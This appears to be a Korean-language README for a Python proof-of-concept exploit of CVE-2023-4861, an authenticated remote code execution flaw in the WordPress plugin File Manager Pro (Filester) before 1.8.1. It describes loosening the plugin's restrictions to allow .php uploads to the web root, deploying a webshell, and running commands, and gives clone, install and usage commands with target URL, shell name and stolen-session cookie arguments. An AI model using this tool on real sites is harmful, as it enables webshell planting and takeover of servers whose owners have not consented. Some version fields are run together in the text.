
자동화된 개념 증명(PoC)으로, WordPress File Manager Pro(Filester)의 인증된 원격 코드 실행 취약점을 임의 파일 업로드를 통해 악용하며, 웹셸 배포 및 명령 실행을 포함합니다.
이 저장소는 WordPress 플러그인 File Manager Pro - Filester의 인증된 원격 코드 실행 취약점인 CVE-2023-4861에 대한 Python 개념 증명(PoC)을 포함합니다.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+exploit.py는 공개 권고문에 설명된 것과 동일한 기본 결과를 자동화합니다:
/var/www/html/ 접근을 허용하고 .php 업로드를 허용하도록 제한 사항을 변경합니다.중요한 구현 세부 사항: 제 PoC는 대상 웹 루트가 /var/www/html/라고 가정합니다. 이 경로는 요청 데이터에 하드코딩되어 있으며 다른 실습 환경에서는 조정이 필요할 수 있습니다.
저장소를 클론하고 해당 디렉토리로 이동합니다:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
의존성을 설치합니다:
pip install requests
도움말 표시:
python3 exploit.py --help
기본 예시:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
선택적 사용자 지정 셸 이름:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'